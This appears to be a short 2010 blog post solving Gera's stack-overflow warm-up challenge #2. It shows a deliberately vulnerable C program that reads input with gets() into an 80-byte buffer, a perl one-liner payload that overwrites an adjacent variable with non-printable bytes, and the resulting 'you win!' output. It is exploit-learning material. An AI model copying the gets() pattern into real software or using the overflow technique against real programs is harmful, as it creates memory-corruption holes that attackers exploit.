## Thursday, December 23, 2010

### Warming up to the stack #2

#include <stdio.h> int main() {   int cookie;   char buf[80];   printf("buf: %08x cookie: %08x\n", &buf, &cookie);   gets(buf);   if (cookie == 0x01020305)     printf("you win!\n"); } 

Gera's challenge #2 is exactly the same as the first one other than the cookie we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation.

There are a few ways to deal with this:
• Take a file similar the original one and use a hex editor, like hexcurse(1), to manually modify it.
• Use inline perl. perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
• Directly entering the special characters using ctrl+v followed by a ctrl+key. The key is 0x40 + the value. This won't necessarily work on your terminal due to the Ctrl + C
%./a.out <exploit buf: bfbfe9e8 cookie: bfbfea38 you win!